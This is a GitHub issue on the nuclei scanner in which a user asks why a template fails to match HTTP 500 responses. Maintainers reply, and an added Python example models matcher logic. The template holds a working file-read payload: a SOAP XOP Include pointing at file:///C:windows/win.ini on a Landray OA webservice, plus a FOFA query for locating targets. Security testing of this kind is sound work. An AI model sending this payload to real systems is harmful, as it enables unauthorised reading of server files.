[BUG] ...How do the nuclei match the result with status code 500 #5920

Open
ltfafei opened this issue Dec 18, 2024 · 2 comments
Labels
Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors.


ltfafei commented Dec 18, 2024

Is there an existing issue for this?

  • I have searched the existing issues.

Current Behavior

I have a requirement to match a result with a status of 500

But nuclei fails to do so.

nuclei POC:

id: test

info:
  name: test
  author: test
  severity: high
  metadata:
    fofasearch:  body="Com_Parameter"

variables:
  boundary: "{{to_lower(rand_base(20))}}"

http:
  - raw:
      - |
        POST /sys/webservice/thirdImSyncForKKWebService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/related; boundary=----{{boundary}}
        SOAPAction: ""

        ------{{boundary}}
        Content-Disposition: form-data; name="a"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.kk.im.third.kmss.landray.com/">
        <soapenv:Header/>
        <type><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:windows/win.ini"/></type>
        </arg0>
        </soapenv:Envelope>
        ------{{boundary}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "<soapenv:Envelope"

      - type: status
        status:
          - 500

Expected Behavior

How do the nuclei match the result with status code 500

Steps To Reproduce

How do the nuclei match the result with status code 500

Relevant log output

Environment

- OS: 
- Nuclei: 
- Go:

Anything else?

No response

@ltfafei ltfafei added the Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors. label Dec 18, 2024
@dogancanbakir
Member

I couldn't repro with a more straightforward example. Could you share the complete repro steps? If possible, the target as well - my Discord handle is @dogancanbakir.


nf-works commented Dec 19, 2024

I don't think the response code matcher is the issue, but your regex matcher.

"<soapenv:Envelope"

That is your request.
The response is without the env part. No?

I would also make it a simple text matcher, since you do not seem to use regex.
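
Added example (not part of the thread and not nuclei's own code): a simplified Python model of how `matchers-condition: and` combines the template's two matchers, showing that a status matcher can succeed on 500 while the template as a whole still reports nothing because the body matcher fails. The response body is constructed, its `soap:` prefix is an assumption, and `eval_matcher` / `eval_template` are hypothetical helper names.

```python
import re

# Constructed sample response (assumption: the server answers with a SOAP
# fault whose envelope uses the "soap:" prefix rather than "soapenv:").
SAMPLE_STATUS = 500
SAMPLE_BODY = (
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soap:Body><soap:Fault><faultstring>constructed fault text</faultstring>"
    "</soap:Fault></soap:Body></soap:Envelope>"
)

def eval_matcher(matcher, status, body):
    """Evaluate one simplified matcher (status, regex or word) on a response."""
    kind = matcher["type"]
    if kind == "status":
        return status in matcher["status"]
    if kind == "regex":
        return any(re.search(p, body) for p in matcher["regex"])
    if kind == "word":
        return any(w in body for w in matcher["words"])
    raise ValueError(f"unsupported matcher type: {kind}")

def eval_template(matchers, condition, status, body):
    """Return (overall result, per-matcher results) for 'and' / 'or'."""
    results = [eval_matcher(m, status, body) for m in matchers]
    overall = all(results) if condition == "and" else any(results)
    return overall, results

# Matchers copied from the issue's template.
ISSUE_MATCHERS = [
    {"type": "regex", "regex": ["<soapenv:Envelope"]},
    {"type": "status", "status": [500]},
]
# Word matcher keyed on text that is present in the constructed response.
REVISED_MATCHERS = [
    {"type": "word", "words": ["<soap:Envelope"]},
    {"type": "status", "status": [500]},
]

if __name__ == "__main__":
    for name, ms in (("issue", ISSUE_MATCHERS), ("revised", REVISED_MATCHERS)):
        overall, each = eval_template(ms, "and", SAMPLE_STATUS, SAMPLE_BODY)
        print(name, "overall:", overall, "per-matcher:", each)
```

Looking at the per-matcher results rather than only the overall result is what separates "status 500 is not matched" from "another matcher in the `and` set failed".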
